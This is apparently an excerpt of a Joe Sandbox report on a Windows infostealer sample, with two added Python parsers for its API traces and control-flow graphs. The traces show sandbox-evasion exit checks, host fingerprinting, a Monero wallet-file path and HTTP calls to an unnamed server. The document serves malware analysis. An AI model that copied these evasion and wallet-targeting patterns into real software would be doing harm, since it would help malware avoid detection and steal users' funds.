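Run over the full lists rather than the sample and the decoded values read directly: the request at 003B6385 is an HTTP GET with INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE, the call at 003B63BF sets INTERNET_OPTION_SECURITY_FLAGS with a 4-byte value the report does not capture, 003B63FD reads HTTP_QUERY_STATUS_CODE, the reads at 003B646D are 1999-byte chunks, and the loop at 0x3C5510 sleeps 60 s between attempts. For the resolver, almost every name is a pointer the sandbox did not dereference; the two plaintext names are resolved from handle 6F070000, which therefore is wininet's load address in this run, and that is the only handle the report lets you label with confidence.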

                            Control-flow Graph (recovered from the graph image; the Executed / Not Executed colouring of the blocks is not preserved as text)
                            Blocks (id address-range calls): 1301 3c17a0-3c17cd call 3caad0, StrCmpCA; 1304 3c17cf-3c17d1 ExitProcess; 1305 3c17d7-3c17f1 call 3caad0; 1309 3c17f4-3c17f8; 1310 3c17fe-3c1811; 1311 3c19c2-3c19cd call 3ca800; 1313 3c199e-3c19bd; 1314 3c1817-3c181a; 1316 3c185d-3c186e StrCmpCA; 1317 3c187f-3c1890 StrCmpCA; 1318 3c1835-3c1844 call 3ca820; 1319 3c1970-3c1981 StrCmpCA; 1320 3c18f1-3c1902 StrCmpCA; 1321 3c1951-3c1962 StrCmpCA; 1322 3c1932-3c1943 StrCmpCA; 1323 3c1913-3c1924 StrCmpCA; 1324 3c18ad-3c18be StrCmpCA; 1325 3c18cf-3c18e0 StrCmpCA; 1326 3c198f-3c1999 call 3ca820; 1327 3c1849-3c1858 call 3ca820; 1328 3c1821-3c1830 call 3ca820; 1335 3c187a; 1336 3c1870-3c1873; 1337 3c189e-3c18a1; 1338 3c1892-3c189c; 1329 3c198d; 1330 3c1983-3c1986; 1343 3c190e; 1344 3c1904-3c1907; 1349 3c196e; 1350 3c1964-3c1967; 1347 3c194f; 1348 3c1945-3c1948; 1345 3c1926-3c1929; 1346 3c1930; 1339 3c18ca; 1340 3c18c0-3c18c3; 1341 3c18ec; 1342 3c18e2-3c18e5; 1355 3c18a8
                            Edges: 1301->1304, 1301->1305, 1305->1309, 1309->1310, 1309->1311, 1310->1313, 1310->1314, 1313->1309, 1314->1316, 1314->1317, 1314->1318, 1314->1319, 1314->1320, 1314->1321, 1314->1322, 1314->1323, 1314->1324, 1314->1325, 1314->1326, 1314->1327, 1314->1328, 1316->1335, 1316->1336, 1317->1337, 1317->1338, 1318->1313, 1319->1329, 1319->1330, 1320->1343, 1320->1344, 1321->1349, 1321->1350, 1322->1347, 1322->1348, 1323->1345, 1323->1346, 1324->1339, 1324->1340, 1325->1341, 1325->1342, 1326->1313, 1327->1313, 1328->1313, 1329->1313, 1330->1329, 1335->1313, 1336->1335, 1337->1355, 1338->1355, 1339->1313, 1340->1339, 1341->1313, 1342->1341, 1343->1313, 1344->1343, 1345->1346, 1346->1313, 1347->1313, 1348->1347, 1349->1313, 1350->1349, 1355->1313
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 003C17C5
                            • ExitProcess.KERNEL32 ref: 003C17D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 7cf03fc493ef0b9d456ceef280f18f47f778fbd1be6e34afa97c02f735d6f2b2
                            • Instruction ID: 729b7de46330bdc9cf38ff87ca6ecead4419ad4a24751f9106a4ab4d13d7f20e
                            • Opcode Fuzzy Hash: 7cf03fc493ef0b9d456ceef280f18f47f778fbd1be6e34afa97c02f735d6f2b2
                            • Instruction Fuzzy Hash: 0E516AB5A04209EBCB06DFA0D954FBE77BAAF45704F10404DE40AEB241D774ED45EBA2

                            Control-flow Graph (blocks and edges of the graph rendered in the original report)
                            • 1356 3c7500-3c754a: GetWindowsDirectoryA -> 1357, 1358
                            • 1357 3c754c -> 1358
                            • 1358 3c7553-3c75c7: GetVolumeInformationA, call 3c8d00 (x3) -> 1365
                            • 1365 3c75d8-3c75df -> 1366, 1367
                            • 1366 3c75fc-3c7617: GetProcessHeap, RtlAllocateHeap -> 1369, 1370
                            • 1367 3c75e1-3c75fa: call 3c8d00 -> 1365
                            • 1369 3c7628-3c7658: wsprintfA, call 3ca740 -> 1377
                            • 1370 3c7619-3c7626: call 3ca740 -> 1377
                            • 1377 3c767e-3c768e
                            Reading: the Windows directory is queried into a MAX_PATH (0x104) buffer, GetVolumeInformationA is called on a stack path Joe did not resolve, a loop over 1365/1367 calls 3c8d00 repeatedly, then a process-heap buffer is allocated and, on one branch, formatted with wsprintfA (the strings ":", "C", "\" and "=" listed under Similarity) before both branches rejoin at 1377.
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003C7542
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003C757F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7603
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C760A
                            • wsprintfA.USER32 ref: 003C7640
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true (associated dumps and IDA snapshot as listed for the first function above)
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\$=
                            • API String ID: 1544550907-3393898382
                            • Opcode ID: e1fd3e55b98d75c55d80ab9675ebad48fc5e9b808390dadb14ed3f3e8aae000a
                            • Instruction ID: 90ce733143e7006e1b3fa7292b20e2f947fd02ead15d49a79da4f873b68ce15c
                            • Opcode Fuzzy Hash: e1fd3e55b98d75c55d80ab9675ebad48fc5e9b808390dadb14ed3f3e8aae000a
                            • Instruction Fuzzy Hash: 634151B1D04258ABDB11DB94DC45FEEBBB8AB18704F10419DF509AB280D7786E44CFA6

                            Control-flow Graph

                            APIs
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01082368), ref: 003C98A1
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01082308), ref: 003C98BA
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,010823C8), ref: 003C98D2
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01082320), ref: 003C98EA
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01082380), ref: 003C9903
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01089208), ref: 003C991B
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01075A50), ref: 003C9933
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01075A10), ref: 003C994C
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01082248), ref: 003C9964
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,010824B8), ref: 003C997C
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01082218), ref: 003C9995
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,010824D0), ref: 003C99AD
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,010757D0), ref: 003C99C5
                              • Part of subcall function 003C9860: GetProcAddress.KERNEL32(74DD0000,01082398), ref: 003C99DE
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003B11D0: ExitProcess.KERNEL32 ref: 003B1211
                              • Part of subcall function 003B1160: GetSystemInfo.KERNEL32(?), ref: 003B116A
                              • Part of subcall function 003B1160: ExitProcess.KERNEL32 ref: 003B117E
                              • Part of subcall function 003B1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003B112B
                              • Part of subcall function 003B1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 003B1132
                              • Part of subcall function 003B1110: ExitProcess.KERNEL32 ref: 003B1143
                              • Part of subcall function 003B1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003B123E
                              • Part of subcall function 003B1220: ExitProcess.KERNEL32 ref: 003B1294
                              • Part of subcall function 003C6770: GetUserDefaultLangID.KERNEL32 ref: 003C6774
                              • Part of subcall function 003B1190: ExitProcess.KERNEL32 ref: 003B11C6
                              • Part of subcall function 003C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003B11B7), ref: 003C7880
                              • Part of subcall function 003C7850: RtlAllocateHeap.NTDLL(00000000), ref: 003C7887
                              • Part of subcall function 003C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003C789F
                              • Part of subcall function 003C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7910
                              • Part of subcall function 003C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003C7917
                              • Part of subcall function 003C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003C792F
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01089298,?,003D110C,?,00000000,?,003D1110,?,00000000,003D0AEF), ref: 003C6ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003C6AE8
                            • CloseHandle.KERNEL32(00000000), ref: 003C6AF9
                            • Sleep.KERNEL32(00001770), ref: 003C6B04
                            • CloseHandle.KERNEL32(?,00000000,?,01089298,?,003D110C,?,00000000,?,003D1110,?,00000000,003D0AEF), ref: 003C6B1A
                            • ExitProcess.KERNEL32 ref: 003C6B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true (associated dumps and IDA snapshot as listed for the first function above)
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2931873225-0
                            • Opcode ID: 5f4d6395aff1af8d8e5bdd92b013dcde451f995f85316a5ed3a18b026028e5fa
                            • Instruction ID: c81cbdf78560937b4258deb426cd9d45c06c68473f8af1cf3d3a712f3ccdfe1f
                            • Opcode Fuzzy Hash: 5f4d6395aff1af8d8e5bdd92b013dcde451f995f85316a5ed3a18b026028e5fa
                            • Instruction Fuzzy Hash: A131D4B1900608AADB06FBA0DC57FEE7778AB14344F50451CF602EA191EF746D05DBA6
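Added example, not part of the Joe Sandbox report or of the sample's code: a Python parser for the "APIs" lines of an entry like the one above. It groups each call under the function Joe attributes it to ("Part of subcall function X:"), names the Win32 constants a reviewer would otherwise look up by hand (0x1F0003 = EVENT_ALL_ACCESS, 0x40 = sizeof(MEMORYSTATUSEX), 0x104 = MAX_PATH, Sleep 0x1770 = 6000 ms), and flags a function as an exit gate when it both probes a host property and calls ExitProcess. The input lines are copied from this entry with some argument lists shortened; the mapping from probe API to the property it reads is the reviewer's own labelling, not Joe's.

```python
import re
from collections import defaultdict

# Constructed input: "APIs" lines copied from this report entry (argument
# lists shortened). "Part of subcall function X:" attributes a call to
# callee X; lines without it belong to the function itself.
REPORT_LINES = """\
• Part of subcall function 003B1160: GetSystemInfo.KERNEL32(?), ref: 003B116A
• Part of subcall function 003B1160: ExitProcess.KERNEL32 ref: 003B117E
• Part of subcall function 003B1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 003B1132
• Part of subcall function 003B1110: ExitProcess.KERNEL32 ref: 003B1143
• Part of subcall function 003B1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003B123E
• Part of subcall function 003B1220: ExitProcess.KERNEL32 ref: 003B1294
• Part of subcall function 003C6770: GetUserDefaultLangID.KERNEL32 ref: 003C6774
• Part of subcall function 003C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003C789F
• OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01089298), ref: 003C6ACA
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003C6AE8
• CloseHandle.KERNEL32(00000000), ref: 003C6AF9
• Sleep.KERNEL32(00001770), ref: 003C6B04
• ExitProcess.KERNEL32 ref: 003C6B22
"""

LINE_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Win32 values that appear literally in the arguments above.
EVENT_ALL_ACCESS = 0x1F0003
SIZEOF_MEMORYSTATUSEX = 0x40
MAX_PATH = 0x104

# APIs that read a host property (reviewer's labelling, not Joe's). A function
# that calls one of these *and* ExitProcess is treated as an exit gate.
PROBE_APIS = {
    "GlobalMemoryStatusEx": "physical RAM",
    "GetSystemInfo": "CPU count / page size",
    "VirtualAllocExNuma": "NUMA allocation support",
    "GetUserDefaultLangID": "user locale",
}


def parse_api_lines(text):
    """One dict per call; hex args become ints, '?' (unresolved) becomes None."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # headings such as "APIs" or "Strings"
        raw = m.group("args")
        args = [] if raw is None else [
            None if a.strip() == "?" else int(a, 16) for a in raw.split(",")
        ]
        calls.append({
            "function": m.group("callee") or "self",
            "api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16),
        })
    return calls


def decode_constants(call):
    """Name the constants a reviewer would otherwise look up by hand."""
    api, a, notes = call["api"], call["args"], []
    if api == "Sleep" and a:
        notes.append(f"sleep {a[0]} ms")
    if api == "OpenEventA" and a and a[0] == EVENT_ALL_ACCESS:
        notes.append("EVENT_ALL_ACCESS")
    if api == "GlobalMemoryStatusEx" and a and a[0] == SIZEOF_MEMORYSTATUSEX:
        notes.append("dwLength = sizeof(MEMORYSTATUSEX)")
    if api in ("GetUserNameA", "GetComputerNameA") and MAX_PATH in a:
        notes.append("MAX_PATH-sized buffer")
    return notes


def find_exit_gates(calls):
    """function -> probed properties, for functions that probe then ExitProcess."""
    by_func = defaultdict(list)
    for c in calls:
        by_func[c["function"]].append(c["api"])
    return {
        f: [PROBE_APIS[x] for x in apis if x in PROBE_APIS]
        for f, apis in by_func.items()
        if "ExitProcess" in apis and any(x in PROBE_APIS for x in apis)
    }


def find_instance_check(calls):
    """OpenEventA + CreateEventA + Sleep in the function itself: wait on a named event."""
    own = [c for c in calls if c["function"] == "self"]
    apis = {c["api"] for c in own}
    if {"OpenEventA", "CreateEventA", "Sleep"} <= apis:
        return {"backoff_ms": next(c["args"][0] for c in own if c["api"] == "Sleep")}
    return None


def analyse(text):
    calls = parse_api_lines(text)
    constants = {}
    for c in calls:
        if notes := decode_constants(c):
            constants[c["ref"]] = notes
    return {"calls": len(calls), "gates": find_exit_gates(calls),
            "instance_check": find_instance_check(calls), "constants": constants}


if __name__ == "__main__":
    for key, value in analyse(REPORT_LINES).items():
        print(key, value)
```

On this input the three callees 003B1160, 003B1110 and 003B1220 are reported as gates; 003C6770 is not, because the only call Joe attributes to it is GetUserDefaultLangID and any ExitProcess tied to the locale check lives in a caller. The function's own OpenEventA/CreateEventA/Sleep triple is reported as a named-event wait with a 6000 ms back-off.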

                            Control-flow Graph (blocks and edges of the graph rendered in the original report)
                            • 1436 3c6af3 -> 1437
                            • 1437 3c6b0a -> 1439, 1440
                            • 1439 3c6b0c-3c6b22: call 3c6920, call 3c5b10, CloseHandle, ExitProcess
                            • 1440 3c6aba-3c6ad7: call 3caad0, OpenEventA -> 1446, 1447
                            • 1446 3c6ad9-3c6af1: call 3caad0, CreateEventA -> 1439
                            • 1447 3c6af5-3c6b04: CloseHandle, Sleep -> 1437
                            Reading: 1437 is a loop head. When OpenEventA (1440) yields a handle, it is closed and the thread sleeps 0x1770 ms (6000 ms) before re-entering the loop at 1437; when it does not, the event is created (1446) and execution reaches the block that ends in ExitProcess (1439). The function therefore waits while a same-named event already exists.
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01089298,?,003D110C,?,00000000,?,003D1110,?,00000000,003D0AEF), ref: 003C6ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003C6AE8
                            • CloseHandle.KERNEL32(00000000), ref: 003C6AF9
                            • Sleep.KERNEL32(00001770), ref: 003C6B04
                            • CloseHandle.KERNEL32(?,00000000,?,01089298,?,003D110C,?,00000000,?,003D1110,?,00000000,003D0AEF), ref: 003C6B1A
                            • ExitProcess.KERNEL32 ref: 003C6B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true (associated dumps and IDA snapshot as listed for the first function above)
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: dde687d3e1cacb85eee3832ba1ad9aad4cff4b57f1e897f886f6e92b1ce29633
                            • Instruction ID: 483a6fe3f105f22673f84626d20af7d365911afde9ce3215cf9d07bec748271c
                            • Opcode Fuzzy Hash: dde687d3e1cacb85eee3832ba1ad9aad4cff4b57f1e897f886f6e92b1ce29633
                            • Instruction Fuzzy Hash: E4F058B4A44209ABE702ABA1DC0BFBE7B78EB14741F10451CB507E91C1DBB46D44EBA7
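Added example, not from the report: a parser for the raw `control_flow_graph` text Joe Sandbox emits behind its rendered graphs (the string embedded below is the one for this function, copied from the report). It recovers basic blocks and edges, finds loops through DFS back edges, and enumerates the simple paths from the entry block to the block that calls ExitProcess, which makes the OpenEventA/CloseHandle/Sleep wait loop and the two routes to the exit block explicit. The node-id heuristic (a decimal id followed by a hex range containing a letter or dash) is an assumption that holds for this report's 0x3B0000-based addresses.

```python
import re
from collections import defaultdict

# Raw control_flow_graph text for this function, copied from the report.
CFG_TEXT = ("control_flow_graph 1436 3c6af3 1437 3c6b0a 1436->1437 "
            "1439 3c6b0c-3c6b22 call 3c6920 call 3c5b10 CloseHandle ExitProcess 1437->1439 "
            "1440 3c6aba-3c6ad7 call 3caad0 OpenEventA 1437->1440 "
            "1446 3c6ad9-3c6af1 call 3caad0 CreateEventA 1440->1446 "
            "1447 3c6af5-3c6b04 CloseHandle Sleep 1440->1447 1446->1439 1447->1437")

NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")


def parse_cfg(text):
    """Return (nodes, edges). nodes: id -> {'range': str, 'label': [tokens]}."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes, edges, i, current = {}, [], 0, None
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                       # edge "src->dst"
            src, dst = tok.split("->")
            edges.append((int(src), int(dst)))
            current, i = None, i + 1
        elif (NODE_ID.match(tok) and i + 1 < len(tokens)
              and ADDR.match(tokens[i + 1])
              and re.search(r"[a-f-]", tokens[i + 1])):
            # Assumption: node id is decimal and the address range that follows
            # always contains a hex letter or a dash (true for this report).
            current = int(tok)
            nodes[current] = {"range": tokens[i + 1], "label": []}
            i += 2
        else:                                 # label token of the current node
            if current is None:
                raise ValueError(f"stray token {tok!r}")
            nodes[current]["label"].append(tok)
            i += 1
    return nodes, edges


def successors(edges):
    succ = defaultdict(list)
    for s, d in edges:
        succ[s].append(d)
    return succ


def entry_nodes(nodes, edges):
    targets = {d for _, d in edges}
    return sorted(n for n in nodes if n not in targets)


def nodes_calling(nodes, api):
    return sorted(n for n, v in nodes.items() if api in v["label"])


def back_edges(nodes, edges):
    """DFS from each entry; an edge into a grey (on-stack) node closes a loop."""
    succ, colour, found = successors(edges), {}, []

    def dfs(n):
        colour[n] = "grey"
        for m in succ[n]:
            if colour.get(m) == "grey":
                found.append((n, m))
            elif m not in colour:
                dfs(m)
        colour[n] = "black"

    for e in entry_nodes(nodes, edges):
        dfs(e)
    return found


def simple_paths(edges, src, dst):
    """All loop-free paths from src to dst."""
    succ, out = successors(edges), []

    def walk(n, path):
        if n == dst:
            out.append(path)
            return
        for m in succ[n]:
            if m not in path:
                walk(m, path + [m])

    walk(src, [src])
    return out


def loop_body(edges, back_edge):
    tail, head = back_edge
    return sorted({n for p in simple_paths(edges, head, tail) for n in p})


def describe(text):
    nodes, edges = parse_cfg(text)
    entry = entry_nodes(nodes, edges)[0]
    exits = nodes_calling(nodes, "ExitProcess")
    return {
        "entry": entry,
        "exit_blocks": exits,
        "paths_to_exit": [[nodes[n]["range"] for n in p]
                          for x in exits for p in simple_paths(edges, entry, x)],
        "loops": [{"back_edge": be, "body": loop_body(edges, be),
                   "apis": sorted({t for n in loop_body(edges, be)
                                   for t in nodes[n]["label"] if t[0].isupper()})}
                  for be in back_edges(nodes, edges)],
    }


if __name__ == "__main__":
    for key, value in describe(CFG_TEXT).items():
        print(key, value)
```

For this graph the only back edge is 1447 -> 1437, the loop body is {1437, 1440, 1447} with OpenEventA, CloseHandle and Sleep inside it, and ExitProcess (1439) is reached either straight from the loop head or through CreateEventA (1446).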

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true (associated dumps and IDA snapshot as listed for the first function above)
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: 89f6470eeb59027e22e83f974124519fd4591873070e673046bcc8ce0b4b5280
                            • Instruction ID: c4578cf0b6b745727a2bb065fa3cbb2b6c6989891ea293b4bac6185a058de939
                            • Opcode Fuzzy Hash: 89f6470eeb59027e22e83f974124519fd4591873070e673046bcc8ce0b4b5280
                            • Instruction Fuzzy Hash: A12162B1D00209ABDF10DF54E845BDE7B74FB44314F108625F519AB2C1EB706A09CF81

                            Control-flow Graph

                            APIs
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003B6280: InternetOpenA.WININET(003D0DFE,00000001,00000000,00000000,00000000), ref: 003B62E1
                              • Part of subcall function 003B6280: StrCmpCA.SHLWAPI(?,0108E7B8), ref: 003B6303
                              • Part of subcall function 003B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B6335
                              • Part of subcall function 003B6280: HttpOpenRequestA.WININET(00000000,GET,?,0108DFD8,00000000,00000000,00400100,00000000), ref: 003B6385
                              • Part of subcall function 003B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003B63BF
                              • Part of subcall function 003B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B63D1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C5228
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true (associated dumps and IDA snapshot as listed for the first function above)
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: 72d6afba42a9a7635ab712a42e80372c9dffe017e620a1566838f53fea802fb2
                            • Instruction ID: 93db41ac6ad04fe5507e840c141d46c349189d214b7cabe1be401aafb0440ce5
                            • Opcode Fuzzy Hash: 72d6afba42a9a7635ab712a42e80372c9dffe017e620a1566838f53fea802fb2
                            • Instruction Fuzzy Hash: E311F570900608ABCB16FBA0D952FED7778AF50304F804558E90A8E592EF34AF06DB92

                            Control-flow Graph (blocks and edges of the graph rendered in the original report)
                            • 1493 3b1220-3b1247: call 3c89b0, GlobalMemoryStatusEx -> 1496, 1497
                            • 1496 3b1249-3b1271: call 3cda00 (x2) -> 1499
                            • 1497 3b1273-3b127a -> 1499
                            • 1499 3b1281-3b1285 -> 1501, 1502
                            • 1501 3b129a-3b129d
                            • 1502 3b1287 -> 1504, 1505
                            • 1504 3b1289-3b1290 -> 1501, 1505
                            • 1505 3b1292-3b1294: ExitProcess
                            Reading: GlobalMemoryStatusEx fills a MEMORYSTATUSEX (dwLength 0x40); the result is passed through two calls to 3cda00 on one branch and then tested at 1502 and again at 1504, and either test can branch to ExitProcess (1505), otherwise execution continues at 1501.
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003B123E
                            • ExitProcess.KERNEL32 ref: 003B1294
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true (associated dumps and IDA snapshot as listed for the first function above)
                            Yara matches
                            Similarity
                            • API ID: ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 803317263-2766056989
                            • Opcode ID: 8baaa6055f99996d1a8dddaa867e818f8d88bbcee3b7b26d8ebbe12d6c503de6
                            • Instruction ID: d0b3fe46223a359b6509849882fe235cf117ee26987b39c6fac7bdee404eef2d
                            • Opcode Fuzzy Hash: 8baaa6055f99996d1a8dddaa867e818f8d88bbcee3b7b26d8ebbe12d6c503de6
                            • Instruction Fuzzy Hash: 05014BB0940308AAEB10EBE4DC49BAEBB78AB14705F608458F705FA280D7B46A458799
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7910
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C7917
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 003C792F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true (associated dumps and IDA snapshot as listed for the first function above)
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: cd78d43ffa4227cc56d301c617fc83fa6ba658972d1326f35c3bef9c8f5cdb1d
                            • Instruction ID: 4b893b6936f5d5cc32ab2607236d1af9427bd30add2feca547593f0e9763e9da
                            • Opcode Fuzzy Hash: cd78d43ffa4227cc56d301c617fc83fa6ba658972d1326f35c3bef9c8f5cdb1d
                            • Instruction Fuzzy Hash: 7B0162B1904204EFC710DF98DD45FAABBB8F704B61F10421AF945E3680C37459048BA2
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003B112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 003B1132
                            • ExitProcess.KERNEL32 ref: 003B1143
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: dfd3ba0a6c18272f46cc2ba0d05b4d2d9caac028db7365aad86fb40ef4954d8c
                            • Instruction ID: 16493c11ffa36b2e6085d8d4110f41308b8dd2d1878b7cde9bb619007dd5fa8e
                            • Opcode Fuzzy Hash: dfd3ba0a6c18272f46cc2ba0d05b4d2d9caac028db7365aad86fb40ef4954d8c
                            • Instruction Fuzzy Hash: 9CE086B0945308FBE7106BA0DC0AB587678EB04B45F500044F70CBA5C0C6F82605EA9A
                            APIs
